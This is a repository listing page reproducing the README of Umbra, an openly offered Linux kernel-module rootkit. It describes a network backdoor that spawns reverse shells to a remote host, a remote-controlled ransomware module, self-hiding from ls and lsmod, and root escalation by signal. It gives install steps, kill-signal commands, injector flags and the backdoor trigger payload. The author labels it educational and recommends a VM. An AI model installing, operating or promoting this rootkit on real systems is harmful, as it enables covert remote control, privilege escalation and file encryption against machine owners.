https://github.com/h3xduck/umbra

A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can spawn a reverse shell to a remote host, launch malware and more.
https://github.com/h3xduck/umbra

backdoor kernel kernel-module linux-kernel linux-kernel-module malware ransomware rootkit

Last synced: about 1 month ago
JSON representation

A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can spawn a reverse shell to a remote host, launch malware and more.

• Host: GitHub
• URL: https://github.com/h3xduck/umbra
• Owner: h3xduck
• License: gpl-2.0
• Created: 2021-04-21T23:13:14.000Z (over 3 years ago)
• Default Branch: master
• Last Pushed: 2021-09-19T11:04:33.000Z (over 3 years ago)
• Last Synced: 2023-10-20T20:08:22.753Z (about 1 year ago)
• Topics: backdoor, kernel, kernel-module, linux-kernel, linux-kernel-module, malware, ransomware, rootkit
• Language: C
• Homepage:
• Size: 190 MB
• Stars: 109
• Watchers: 6
• Forks: 26
• Open Issues: 5
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Awesome Lists containing this project

README

        
![GitHub release (latest by date including pre-releases)](https://img.shields.io/github/v/release/h3xduck/Umbra?include_prereleases)

![Maintainability](https://img.shields.io/static/v1?label=maintainability&message=B&color=green)

![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/h3xduck/Umbra)

![GitHub last commit](https://img.shields.io/github/last-commit/h3xduck/Umbra)

# Umbra 

Umbra is an experimental remotely controllable LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that can spawn reverse shells to remote hosts, launch malware remotely and much more. 

The rootkit is still under development, although the features listed below are already fully operational.

![Backdoor in action](https://github.com/h3xduck/Umbra/blob/master/images/umbra4.0_1.gif)

Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.

## Features

* :star2: Backdoor which spawns reverse shell to remote IP after receiving a malicious TCP packet.

* :star2: Use the *Umbra Injector* to control the rootkit remotely:

  * Remote reverse shell.

  * Hide/unhide rootkit remotely.

  * Launch *Umbra Modules*.

    



* **NEW:** Added the ***Umbra Modules***, special malware-like modules which enhance Umbra and can be launched remotely by the Umbra Injector.

* **NEW:** Umbra module "***Ransom***" which turns Umbra into a remotely controllable ransomware.

![Ransom module in action](https://github.com/h3xduck/Umbra/blob/master/images/umbra4.0_2.gif)

* Umbra hides all its files and directories from user commands such as *ls*.

* Umbra can hide/unhide itself remotely and locally via signals.

* Privilege escalation by sending signal 50.

* Spawn netcat reverse shell on module load.

* Spawn netcat reverse shell to a remote host by sending signal 51.

More functionalities will come in later updates.

## Disclaimer

This rookit is **purely for educational purposes**. I am not responsible for any damage resulting from its unintended use.

Also bear in mind that Umbra only incorporates light hiding and protection mechanisms. It is **not** intended to be used on a real scenario.

**IMPORTANT:** If you are going to test this rootkit in your own machine, I *strongly recommend* to use a VM. 

**About the Umbra Modules:** The *ransom* module uses a trivial encryption mechanism but it can and will certainly encrypt any folder in your machine. Although files can be easily decrypted, I *definitely do not recommend* running this towards your root folder or similar unless on a controlled environment.

## Table of Contents

1. [Build and Install](#build-and-install)

2. [Unloading Umbra](#unloading-umbra)

3. [Local Control](#basic-usage-local-control)

4. [Umbra Injector: Remote Control](#umbra-injector-remote-control)

5. [Umbra Modules](#umbra-modules)

   * [(NEW) Ransom](#ransom-module)

6. [References](#references)

## Build and install

Remember that you should have a 4.x or 5.x kernel available.

1. Download your kernel header files

```sh

apt install linux-headers-$(uname -r)

```

2. Configure your include path to cover the kernel header directory (usually under /usr/src). If you are using vscode, you can check ```.vscode/c_cpp_properties.json``` for an example on which directories to include.

3. Clone the project

```

git clone https://github.com/h3xduck/Umbra.git

cd Umbra

```

4. Build Umbra

```

make

```

5. Load Umbra in the kernel and configure environment

The script will install Umbra in the kernel and configure a special directory where to store the malware modules. The directory will be later hidden by the rootkit.

```

sudo ./install.sh

```

If you have previously run the script and wish to just install Umbra in the kernel, you can run:

```

sudo insmod ./umbra.ko

```

## Unloading Umbra

Make sure Umbra is not in invisible mode, otherwise this will fail.

```

sudo rmmod umbra

```

## Basic Usage: Local control

### Change current user privileges to root

* Send signal 50 to any PID.

```

kill -50 1

```

### Start reverse netcat shell to IP:PORT

* Set your desired IP and port in CONFIG.H before building the rootkit. By default 127.0.0.1:5888

* Start listening at the remote host.

```

nc -lvp 5888

```

* Send signal 51 to any PID. Umbra will catch it and start the shell.

```

kill -51 1

```



Note: Umbra also tries to start the reverse shell on load.

### Hide the rootkit - Invisible mode

This will prevent the rootkit from being shown by commands such as *lsmod*, or being removed via *rmmod*.

```

kill -52 1

```

### Unhide the rootkit

This reverts the invisible mode if active.

```

kill -53 1

```

## Umbra Injector: Remote control

### Get reverse shell via backdoor

The Umbra Injector can be run either before Umbra is installed (thus getting the shell once it is on), or after Umbra is installed on the target system.

```

./injector -S 127.0.0.1

```

The backdoor listens for packets with the following payload: 

`UMBRA_PAYLOAD_GET_REVERSE_SHELL`.

You can also build your own injector using my library [RawTCP](https://github.com/h3xduck/RawTCP_Lib).

### Hide the rootkit remotely - Invisible mode

This will prevent the rootkit from being shown by commands such as *lsmod*, or being removed via *rmmod*.

```

./injector -i 127.0.0.1

```

### Unhide the rootkit remotely

This reverts the invisible mode if active.

```

./injector -u 127.0.0.1

```

### Help

You can see the full information on how to run the Umbra Injector by:

```

./injector -h

```

## Umbra Modules

The Umbra Modules will be stored by the *install.sh* script on /tmp/umbra, where Umbra will hide them. The directory will not visible by commands such as *ls* or similar.

### Ransom module

This module can launch remote ransomware-like attacks via the Umbra Injector. Encrypted files appear with the *.ubr* extension.

Currently the encryption mechanism is a simple bit-level NOP, as a proof of concept. You may edit the module to include your own encryption algorithm.

#### Encrypt a directory and all its sub-directories

```

./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

```

#### Decrypt a directory and all its sub-directories

```

./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

```

## References

The development of this rootkit involved a substantial amount of research about LKMs and rootkit techniques. The following is an incomplete list of the resources I used:

How to create LKMs:

* https://sysprog21.github.io/lkmpg/

Linux syscall reference:

* https://syscalls64.paolostivanin.com/

Some rootkit references:

* https://xcellerator.github.io/posts/

* https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt

* https://github.com/f0rb1dd3n/Reptile

## License

This project is licensed under the GPLv2 license. See [LICENSE](https://github.com/h3xduck/Umbra/blob/master/LICENSE)